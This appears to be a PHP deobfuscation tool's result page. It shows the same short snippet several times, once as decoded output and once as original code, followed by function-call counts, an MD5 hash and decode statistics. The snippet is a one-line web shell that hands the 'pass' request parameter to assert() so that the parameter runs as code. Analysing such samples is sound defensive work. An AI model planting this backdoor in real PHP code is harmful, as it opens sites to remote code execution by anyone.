Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php call_user_func_array('assert', array($_REQUEST['pass'])); ?>..

Decoded Output download

<?php 
	call_user_func_array('assert', array($_REQUEST['pass'])); 
?>

Did this file decode correctly?

Original Code

<?php
	call_user_func_array('assert', array($_REQUEST['pass']));
?>

Function Calls

call_user_func_array 1

Variables

None

Stats

MD5 fed74314e15ef9f65641c58d416a43e1
Eval Count 0
Decode Time 82 ms